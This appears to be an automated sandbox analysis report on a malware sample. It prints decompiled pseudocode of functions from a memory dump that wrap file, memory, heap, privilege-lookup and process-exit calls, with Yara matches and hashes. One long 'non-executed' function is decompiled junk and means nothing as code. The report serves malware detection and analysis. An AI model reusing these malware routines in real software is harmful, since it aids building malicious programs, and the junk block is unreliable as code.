                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 8c611135a10aadc5e8670315ff8e2429ec392b1ad6360f930bdda4e6ba05dbc7
                                                          • Instruction ID: 9aeb3f273e2a1c80042d7faf8167de887a80ae2cc26f5a853637190c0ff91290
                                                          • Opcode Fuzzy Hash: 8c611135a10aadc5e8670315ff8e2429ec392b1ad6360f930bdda4e6ba05dbc7
                                                          • Instruction Fuzzy Hash: 7BF0B2B7205549AFCB48CF8CEC80CDB77A9AF8C314B159249FA5DD3251C630E892CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041840A, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 44%
                                                          			E0041840A(void* __eflags, PVOID* _a4, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				intOrPtr* __esi;
				void* __ebp;
				long _t21;
				void* _t29;

				if(__eflags != 0) {
					asm("in al, dx");
					_t17 = _a8;
					_t3 = _t17 + 0xc60; // 0xca0
					E00418DB0(_t29, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
					_t21 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
					return _t21;
				} else {
					asm("invalid");
					__ebp = __esp;
					__eax = _a4;
					_t12 = __eax + 0xc68; // 0x10c68
					__esi = _t12;
					__eax = E00418DB0(__edi, _a4, __esi,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x32);
					__edx = _a20;
					__eax = _a16;
					__edx = _a8;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, _a12, _a16, _a20, __esi, __ebp, __edx); // executed
					_pop(__esi);
					_pop(__ebp);
					return  *__esi;
				}
			}







                                                          0x0041840b
                                                          0x00418392
                                                          0x00418393
                                                          0x0041839f
                                                          0x004183a7
                                                          0x004183c9
                                                          0x004183cd
                                                          0x0041840d
                                                          0x0041840e
                                                          0x00418411
                                                          0x00418413
                                                          0x0041841f
                                                          0x0041841f
                                                          0x00418427
                                                          0x0041842c
                                                          0x0041842f
                                                          0x00418439
                                                          0x0041843d
                                                          0x00418441
                                                          0x00418443
                                                          0x00418444
                                                          0x00418445
                                                          0x00418445

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 285f189b122dd81e29a5299458632e28bcea5bae0159b7e1871e0ae6a409a51d
                                                          • Instruction ID: 117fbd5b629f376d90055feb29202e38dd56e6e6f4852f196b11b5e1eeeeb5e1
                                                          • Opcode Fuzzy Hash: 285f189b122dd81e29a5299458632e28bcea5bae0159b7e1871e0ae6a409a51d
                                                          • Instruction Fuzzy Hash: 82F0F8B2200218ABCB14DF89DC81EEB77A9AF98754F158159BA1C97241C635E911CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				asm("in al, dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                          0x00418392
                                                          0x00418393
                                                          0x0041839f
                                                          0x004183a7
                                                          0x004183c9
                                                          0x004183cd

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                          0x004182e3
                                                          0x004182e6
                                                          0x004182ef
                                                          0x004182f7
                                                          0x00418305
                                                          0x00418309

                                                          APIs
                                                          • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                          • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                          • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                          • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E00407260(void* __ebx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B10(__ebx, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 != 0) {
						L4:
						return _t14;
					}
					_t14 =  *_t26(_t22, 0x8003, _t27 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					asm("salc");
					goto L4;
				}
				return _t13;
			}













                                                          0x00407260
                                                          0x0040726f
                                                          0x00407273
                                                          0x0040727e
                                                          0x0040728a
                                                          0x0040728e
                                                          0x0040729e
                                                          0x004072a3
                                                          0x004072aa
                                                          0x004072ad
                                                          0x004072ba
                                                          0x004072bc
                                                          0x004072be
                                                          0x004072dd
                                                          0x00000000
                                                          0x004072dd
                                                          0x004072db
                                                          0x004072dc
                                                          0x00000000
                                                          0x004072dc
                                                          0x004072e2

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418616, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 50%
                                                          			E00418616(void* __eax, signed int __ecx, signed int* __esi, intOrPtr _a12, WCHAR* _a16, WCHAR* _a20, struct _LUID* _a24) {
				int _t14;
				void* _t20;
				void* _t27;

				asm("movsb");
				_pop(_t24);
				_pop(ds);
				 *__esi =  *__esi | __ecx;
				 *0xec8b552e = _t27 - __eax;
				_t11 = _a12;
				_push(__esi);
				E00418DB0(_t20, _a12, _a12 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a16, _a20, _a24); // executed
				return _t14;
			}






                                                          0x00418617
                                                          0x00418618
                                                          0x0041861b
                                                          0x0041861c
                                                          0x0041861e
                                                          0x00418623
                                                          0x0041862c
                                                          0x0041863a
                                                          0x00418650
                                                          0x00418654

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 3735fb45e2b58333937f96120a4785db7e1e1609f35f98435dc664b666e6623b
                                                          • Instruction ID: a629546d7be5f20f0fb5b7259a738e3e1604616e9151bffe0c192541aea86fb8
                                                          • Opcode Fuzzy Hash: 3735fb45e2b58333937f96120a4785db7e1e1609f35f98435dc664b666e6623b
                                                          • Instruction Fuzzy Hash: C1E03075300204AFCB14DF58DC45EE73BA99F59250F014559F94897242C531A94187A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E004184B2(void* __eax, void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _v1;
				char _t13;
				void* _t19;
				signed int _t20;

				_t20 =  *(__edx - 0x35c48c6f) * 0x8b552bd8;
				_push( &_v1);
				_t10 = _a4;
				_push(_t20);
				_t4 = _t10 + 0xc74; // 0xc74
				E00418DB0(_t19, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t13 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t13;
			}







                                                          0x004184b8
                                                          0x004184c0
                                                          0x004184c3
                                                          0x004184c9
                                                          0x004184cf
                                                          0x004184d7
                                                          0x004184ed
                                                          0x004184f1

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 190d3260ff3863222697344ad2352549453e4316aa45430a97e6f99a48857985
                                                          • Instruction ID: d7724fd7ebfb08472950f0ff2e4ed3e44c5ee24ed50e061c7f7280e978d57307
                                                          • Opcode Fuzzy Hash: 190d3260ff3863222697344ad2352549453e4316aa45430a97e6f99a48857985
                                                          • Instruction Fuzzy Hash: FEE092B1600205AFDB18DF65DC44ED77769EF84350F114659FD18AB381CA31E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x004184cf
                                                          0x004184d7
                                                          0x004184ed
                                                          0x004184f1

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x00418497
                                                          0x004184ad
                                                          0x004184b1

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x0041863a
                                                          0x00418650
                                                          0x00418654

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 28%
                                                          			E004184F2(int _a4) {
				intOrPtr _v0;
				void* _t12;

				asm("stosb");
				asm("cmc");
				asm("o16 enter 0x8b55, 0xec");
				_t7 = _v0;
				_push(_t13);
				E00418DB0(_t12, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}





                                                          0x004184f4
                                                          0x004184fc
                                                          0x004184fe
                                                          0x00418503
                                                          0x0041850c
                                                          0x0041851a
                                                          0x00418528

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: 30dffdf5cb7388b2714e865c31404e69ea6c6e1a622c9ce315e99930d77a27b5
                                                          • Instruction ID: d4cd46a4d61232390141afba0ea97c72cb5c019464417ac5abf5aaebb8863c7a
                                                          • Opcode Fuzzy Hash: 30dffdf5cb7388b2714e865c31404e69ea6c6e1a622c9ce315e99930d77a27b5
                                                          • Instruction Fuzzy Hash: 96E08C756002007BEB20CF1ACC85FC73B689F89250F0580AABA595B681CA30EA02CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                          0x00418503
                                                          0x0041851a
                                                          0x00418528

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0049BF7F, Relevance: 3.0, Instructions: 2964COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E0049BF7F(signed int __eax, signed char __ebx, signed int __ecx, signed int* __edx, intOrPtr* __edi, intOrPtr* __esi, void* __fp0) {
				signed char _t436;
				signed char _t438;
				signed int _t440;
				signed int _t441;
				intOrPtr* _t444;
				signed char _t445;
				signed char _t446;
				signed char _t453;
				intOrPtr* _t840;
				intOrPtr* _t844;
				signed char _t845;
				signed char _t846;
				signed int _t847;
				void* _t848;
				signed char _t850;
				signed char _t851;
				void* _t852;
				signed char _t853;
				void* _t854;
				signed int _t883;
				intOrPtr* _t1036;
				intOrPtr* _t1040;
				void* _t1041;
				void* _t1053;
				signed char _t1062;
				void* _t1398;

				_t1398 = __fp0;
				_t1040 = __esi;
				_t1036 = __edi;
				_t1001 = __edx;
				_t883 = __ecx;
				_t851 = __ebx;
				_t436 = __eax | 0xffff263a;
				asm("invalid");
				_pop(ss);
				asm("adc [ebx], ecx");
				if(_t436 == 0) {
					 *_t436 =  *_t436 + _t436;
					 *((intOrPtr*)(__ecx + 0x7b750b11)) =  *((intOrPtr*)(__ecx + 0x7b750b11)) + _t1041;
					 *_t436 =  *_t436 + _t436;
					 *((intOrPtr*)(__edi + 0x5d)) =  *((intOrPtr*)(__edi + 0x5d)) + _t1041;
					 *_t436 =  *_t436 + _t436;
					asm("fcom qword [ecx]");
					 *__edx =  *__edx | __ecx;
					_push(es);
					_t844 = (_t436 |  *_t436) -  *(_t436 |  *_t436) -  *((intOrPtr*)((_t436 |  *_t436) -  *(_t436 |  *_t436)));
					 *_t844 =  *_t844 + _t844;
					 *_t844 =  *_t844 + __edx;
					 *_t844 =  *_t844 + _t844;
					_t845 = _t844 +  *_t844;
					asm("insd");
					_t1001 = __edx + __ecx;
					_push(__edi);
					L2:
					 *_t1036 =  *_t1036 + _t1001;
					 *_t845 =  *_t845 + _t845;
					 *_t845 =  *_t845 + _t845;
					asm("adc esi, [eax]");
					_t846 = _t845;
					_push(_t1001);
					 *_t846 =  *_t846 + _t846;
					 *_t1036 =  *_t1036 + _t883;
					 *_t883 =  *_t883 + _t1001;
					 *_t846 =  *_t846 + _t846;
					 *_t846 =  *_t846 + _t846;
					_t847 = _t846 + 0xa;
					ss = es;
					_t883 = _t883 +  *[cs:ebx];
					 *_t847 =  *_t847 & _t847;
					_t851 = _t851 +  *((intOrPtr*)(_t851 - 0x47)) +  *((intOrPtr*)(_t851 +  *((intOrPtr*)(_t851 - 0x47)) - 0x46));
					 *_t847 =  *_t847 + _t847;
					_t848 = _t847 + 0x1f;
					asm("adc [ebp+0x10000ae], cl");
					L3:
					 *0xdcd0 =  *0xdcd0 + _t1053;
					_t850 = _t848 + 0x00000028 ^ 0x6f0a0001;
					 *[ss:eax] =  *[ss:eax] + _t850;
					_t845 = _t850 |  *_t850;
					_t1053 = _t1053 -  *_t845;
					 *_t1001 =  *_t1001 + _t845;
					if( *_t1001 != 0) {
						goto L2;
					}
					 *_t845 =  *_t845 + _t845;
					_t436 = _t845 + 0x1e;
					_t1041 = _t1040 + 0x25010000;
					asm("rcr ch, 1");
					 *_t436 =  *_t436 + _t436;
				}
				_t438 = _t436 + 0x00000028 ^ 0x6f0a0001;
				 *[ss:eax] =  *[ss:eax] + _t438;
				_t440 = (_t438 |  *_t438) -  *(_t438 |  *_t438);
				 *_t1001 =  *_t1001 + _t883;
				while(1) {
					L6:
					 *_t440 =  *_t440 + _t440;
					asm("adc esi, [eax]");
					 *_t440 =  *_t440 + _t440;
					_t441 = _t440;
					 *_t441 =  *_t441 + _t441;
					 *_t441 =  *_t441 | _t441;
					 *_t883 =  *_t883 + _t1001;
					while(1) {
						L7:
						asm("adc [eax], eax");
						_t852 = _t851 +  *((intOrPtr*)(_t851 - 0x48));
						 *_t441 =  *_t441 + _t441;
						_push(es);
						_t444 = _t441 + 0xa -  *((intOrPtr*)(_t441 + 0xa)) -  *_t1040;
						 *_t1001 =  *_t1001 + _t444;
						_t1036 = _t1036 +  *(_t1041 - 0x48);
						 *_t444 =  *_t444 + _t444;
						_t445 = _t444 + 0x2a;
						asm("into");
						 *_t1001 =  *_t1001 + _t445;
						 *_t1001 =  *_t1001 - _t852;
						 *_t445 =  *_t445 + _t445;
						_t446 = _t445 |  *_t445;
						_t853 = _t852 +  *((intOrPtr*)(_t1040 + 0x45));
						_t1062 = _t853;
						L9:
						while(1) {
							if(_t1062 > 0) {
								 *_t446 =  *_t446 + _t446;
								_t853 = _t853 |  *(_t1041 - 0x48);
								 *_t446 =  *_t446 + _t446;
								_t446 = _t446 + 2;
								if(_t446 >= 0) {
									L15:
									 *_t1001 =  *_t1001 + _t883;
									if ( *_t1001 >= 0) goto L9;
								} else {
									 *_t446 =  *_t446 + _t446;
									_t851 = _t853 |  *(_t1041 - 0x46);
									 *_t446 =  *_t446 + _t446;
									_t440 = _t446 + 2;
									if(_t440 != 0) {
										goto L6;
									} else {
										 *_t440 =  *_t440 + _t440;
										_t441 = _t440 + 0x17;
										asm("outsd");
										 *_t1001 =  *_t1001 + _t883;
										 *_t1001 =  *_t1001 + _t441;
										_pop(ss);
										if( *_t1001 >= 0) {
											goto L7;
										} else {
											 *_t441 =  *_t441 + _t441;
											_t840 = _t441 + 0x2a;
											 *_t840 =  *_t840 + _t840;
											asm("adc esi, [eax]");
											_t453 = _t851;
											_t854 = _t840 +  *_t840;
											 *_t453 =  *_t453 + _t453;
											 *_t1036 =  *_t1036 + _t883;
											 *_t883 =  *_t883 + _t1001;
											 *_t1001 =  *_t1001 + _t453;
											 *_t1001 =  *_t1001 - _t854;
											 *_t453 =  *_t453 + _t453;
											_t446 = _t453 |  *_t453;
											_t853 = _t854 +  *((intOrPtr*)(_t1040 + 0x45));
											 *_t446 =  *_t446 + _t446;
											goto L15;
										}
									}
								}
							}
						}
					}
					goto L3;
				}
			}





























                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf7f
                                                          0x0049bf84
                                                          0x0049bf86
                                                          0x0049bf87
                                                          0x0049bf89
                                                          0x0049bf8b
                                                          0x0049bf8d
                                                          0x0049bf94
                                                          0x0049bf96
                                                          0x0049bf99
                                                          0x0049bf9d
                                                          0x0049bf9f
                                                          0x0049bfa3
                                                          0x0049bfa4
                                                          0x0049bfa6
                                                          0x0049bfa8
                                                          0x0049bfaa
                                                          0x0049bfac
                                                          0x0049bfae
                                                          0x0049bfaf
                                                          0x0049bfb1
                                                          0x0049bfb2
                                                          0x0049bfb2
                                                          0x0049bfb4
                                                          0x0049bfb6
                                                          0x0049bfb8
                                                          0x0049bfba
                                                          0x0049bfbc
                                                          0x0049bfbd
                                                          0x0049bfbf
                                                          0x0049bfc2
                                                          0x0049bfc4
                                                          0x0049bfc9
                                                          0x0049bfcb
                                                          0x0049bfce
                                                          0x0049bfcf
                                                          0x0049bfd2
                                                          0x0049bfd4
                                                          0x0049bfd7
                                                          0x0049bfd9
                                                          0x0049bfdb
                                                          0x0049bfe0
                                                          0x0049bfe0
                                                          0x0049bfe8
                                                          0x0049bfed
                                                          0x0049bff0
                                                          0x0049bff2
                                                          0x0049bff4
                                                          0x0049bff6
                                                          0x00000000
                                                          0x00000000
                                                          0x0049bff8
                                                          0x0049bffa
                                                          0x0049bffc
                                                          0x0049c002
                                                          0x0049c004
                                                          0x0049c004
                                                          0x0049c008
                                                          0x0049c00d
                                                          0x0049c012
                                                          0x0049c014
                                                          0x0049c016
                                                          0x0049c016
                                                          0x0049c016
                                                          0x0049c018
                                                          0x0049c01a
                                                          0x0049c01c
                                                          0x0049c01e
                                                          0x0049c020
                                                          0x0049c022
                                                          0x0049c023
                                                          0x0049c023
                                                          0x0049c023
                                                          0x0049c025
                                                          0x0049c028
                                                          0x0049c02e
                                                          0x0049c02f
                                                          0x0049c031
                                                          0x0049c033
                                                          0x0049c036
                                                          0x0049c038
                                                          0x0049c03a
                                                          0x0049c03b
                                                          0x0049c03d
                                                          0x0049c03f
                                                          0x0049c041
                                                          0x0049c043
                                                          0x0049c043
                                                          0x00000000
                                                          0x0049c044
                                                          0x0049c044
                                                          0x0049c046
                                                          0x0049c048
                                                          0x0049c04b
